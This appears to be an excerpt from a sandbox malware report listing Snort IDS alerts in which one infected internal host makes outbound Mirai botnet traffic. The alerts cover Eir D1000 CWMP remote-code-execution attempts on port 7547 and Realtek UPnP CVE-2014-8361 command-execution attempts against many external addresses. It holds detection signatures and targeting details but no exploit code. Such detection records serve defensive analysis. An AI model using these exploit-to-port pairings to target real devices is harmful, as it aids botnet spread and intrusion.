Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:52744 -> 45.36.95.180:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49914 -> 83.136.193.213:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60298 -> 83.64.110.129:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:52974 -> 32.211.128.118:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43242 -> 83.223.99.90:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35930 -> 178.79.146.107:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36524 -> 178.62.232.193:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41116 -> 178.62.0.120:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54350 -> 178.62.28.136:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46808 -> 178.33.68.152:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54782 -> 178.62.214.37:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45588 -> 178.1.155.209:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50998 -> 178.114.92.232:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41262 -> 178.114.98.184:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43724 -> 178.254.151.62:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53318 -> 75.163.83.19:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53022 -> 32.211.128.118:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45370 -> 190.167.182.188:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:37168 -> 173.171.211.188:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40708 -> 178.135.100.199:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42472 -> 178.204.147.131:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59546 -> 178.46.153.38:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35858 -> 181.214.183.211:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:35578 -> 14.62.208.103:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55522 -> 222.104.93.31:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:42012 -> 181.164.50.172:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53398 -> 75.163.83.19:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45452 -> 190.167.182.188:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40960 -> 178.89.200.122:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:37250 -> 173.171.211.188:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45924 -> 178.128.225.147:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42824 -> 178.159.88.12:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:33688 -> 187.105.105.214:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46954 -> 27.238.2.253:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:51128 -> 14.52.93.199:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:60592 -> 181.230.44.96:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:33710 -> 187.105.105.214:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46976 -> 27.238.2.253:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:51150 -> 14.52.93.199:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:60614 -> 181.230.44.96:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56664 -> 88.119.230.124:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43078 -> 88.221.226.191:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49110 -> 213.244.49.125:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60576 -> 213.209.19.191:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50450 -> 213.154.237.219:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:48110 -> 213.119.25.107:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57188 -> 213.204.35.236:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50050 -> 213.49.201.44:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44986 -> 213.135.167.98:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43790 -> 213.139.78.125:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47954 -> 213.19.25.254:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52494 -> 213.226.11.182:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42528 -> 213.197.180.148:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45988 -> 213.152.52.176:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50440 -> 213.63.136.36:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47158 -> 213.30.47.120:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45496 -> 213.195.99.94:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41826 -> 213.167.130.233:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43710 -> 213.248.168.120:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:56396 -> 200.71.58.187:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57698 -> 181.215.70.184:80 |
Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33952 -> 164.155.158.63:52869 |
Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46716 -> 78.116.17.77:52869 |
Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46720 -> 78.116.17.77:52869 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59768 -> 213.211.78.240:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35850 -> 206.161.202.231:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35492 -> 206.180.183.97:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50446 -> 206.127.26.76:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35646 -> 181.40.76.162:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34942 -> 206.119.93.38:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47850 -> 206.233.166.103:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54570 -> 206.233.209.206:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50272 -> 206.237.251.71:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34100 -> 206.189.82.200:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:57136 -> 99.237.161.147:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48250 -> 186.7.31.59:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36080 -> 206.206.239.102:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:60936 -> 81.149.181.229:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:51404 -> 68.203.175.132:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45848 -> 189.229.9.191:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53778 -> 188.30.79.14:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:58586 -> 24.243.101.120:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:60952 -> 81.149.181.229:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:50984 -> 196.235.179.9:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53798 -> 188.30.79.14:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:47074 -> 189.18.42.1:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:57228 -> 99.237.161.147:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45730 -> 50.48.51.128:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:40294 -> 125.135.94.45:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48270 -> 186.7.31.59:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:51010 -> 196.235.179.9:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36100 -> 206.206.239.102:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48506 -> 189.239.21.35:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45872 -> 189.229.9.191:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:51428 -> 68.203.175.132:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:58692 -> 24.243.101.120:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45762 -> 50.48.51.128:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48384 -> 191.178.62.24:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:47108 -> 189.18.42.1:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46026 -> 200.161.46.18:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59300 -> 201.87.14.102:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48542 -> 189.239.21.35:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:40418 -> 125.135.94.45:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48408 -> 191.178.62.24:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46052 -> 200.161.46.18:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59326 -> 201.87.14.102:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41984 -> 200.234.148.247:80 |
Source: Traffic | Snort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50524 -> 5.9.93.5:80 |
Source: Traffic | Snort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36006 -> 5.62.54.83:80 |
Source: Traffic | Snort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46548 -> 5.61.60.31:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:48244 -> 200.150.13.70:80 |
Source: Traffic | Snort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44940 -> 46.242.199.79:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52442 -> 181.215.188.24:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40096 -> 200.29.16.30:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53726 -> 181.215.89.48:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59840 -> 200.27.212.103:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41188 -> 169.50.30.3:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:52190 -> 99.244.226.204:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:52176 -> 64.138.253.166:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54358 -> 169.46.97.194:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55682 -> 169.197.183.140:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54818 -> 169.229.236.52:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:52350 -> 99.244.226.204:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:52340 -> 64.138.253.166:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:57120 -> 109.255.74.108:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:52478 -> 86.188.121.9:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:37004 -> 179.153.78.154:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:38470 -> 96.39.177.216:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:57134 -> 109.255.74.108:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56956 -> 174.114.120.151:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59588 -> 89.43.151.173:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55518 -> 118.34.158.50:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:43458 -> 115.17.84.120:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:52494 -> 86.188.121.9:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:54520 -> 98.28.57.247:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48726 -> 74.75.58.54:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56980 -> 174.114.120.151:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:47368 -> 67.168.199.190:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59614 -> 89.43.151.173:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59424 -> 103.255.177.194:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:37036 -> 179.153.78.154:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:38500 -> 96.39.177.216:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:54552 -> 98.28.57.247:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48758 -> 74.75.58.54:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55636 -> 221.167.119.200:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55556 -> 118.34.158.50:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49752 -> 181.167.26.157:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:43498 -> 115.17.84.120:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:47398 -> 67.168.199.190:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55658 -> 221.167.119.200:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49770 -> 181.167.26.157:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35266 -> 82.220.37.238:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53932 -> 213.188.220.23:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51254 -> 213.132.196.171:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42802 -> 82.165.167.185:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40010 -> 213.250.39.67:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36930 -> 213.171.213.123:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57746 -> 213.78.119.38:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59262 -> 213.103.153.12:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57456 -> 213.169.33.99:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51016 -> 82.65.170.102:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44310 -> 82.94.235.149:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52244 -> 82.70.187.254:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42078 -> 213.21.84.154:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49472 -> 213.110.209.12:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:32894 -> 213.149.24.80:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33084 -> 213.0.13.38:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52068 -> 82.223.223.42:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49344 -> 82.209.217.97:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54056 -> 82.127.133.204:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55768 -> 169.197.183.140:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45242 -> 82.208.130.123:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53522 -> 82.207.36.60:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59188 -> 213.8.13.79:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59690 -> 213.57.24.82:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59512 -> 82.81.197.169:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58926 -> 82.81.131.37:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47068 -> 82.117.166.162:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:51914 -> 75.245.186.106:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:52102 -> 75.245.186.106:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45044 -> 74.65.38.225:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49054 -> 97.85.179.249:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45054 -> 74.65.38.225:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49064 -> 97.85.179.249:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59298 -> 213.8.13.79:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:38390 -> 181.214.75.105:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33226 -> 181.214.57.141:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33522 -> 181.36.212.227:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58832 -> 181.57.77.131:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57146 -> 181.224.30.245:80 |
